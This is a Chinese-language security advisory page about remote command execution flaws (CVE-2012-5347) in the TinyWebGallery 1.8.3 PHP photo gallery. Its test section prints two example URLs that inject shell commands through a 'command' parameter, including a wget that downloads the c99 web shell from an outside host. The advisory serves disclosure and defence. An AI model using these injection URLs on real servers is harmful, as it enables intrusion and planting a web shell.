发布日期:2012-01-09
更新日期:2012-10-16受影响系统:
TinyWebGallery TinyWebGallery 1.8.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51325
CVE ID: CVE-2012-5347TinyWebGallery是基于php的开源相册。TinyWebGallery 1.8.3及其他版本存在多个远程命令执行漏洞,攻击者可利用这些漏洞在受影响应用上下文中执行任意命令。<*来源:Expl0!Ts
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/inc/filefunctions.inc.php?command=&lt;id&gt;;&lt;pwd&gt;;&lt;wget http://shell.org/c99.zip&gt;
http://www.example.com/info.php?command=&lt;id&gt;;&lt;pwd&gt;;&lt;wget http://shell.org/c99.zip&gt;建议:
--------------------------------------------------------------------------------
厂商补丁:TinyWebGallery
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.tinywebgallery.com/en/overview.phpWordPress Guest Posting插件"uploadify.php"任意文件上传漏洞Ubuntu Software Properties PPA GPG密钥验证安全绕过漏洞相关资讯 TinyWebGallery 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站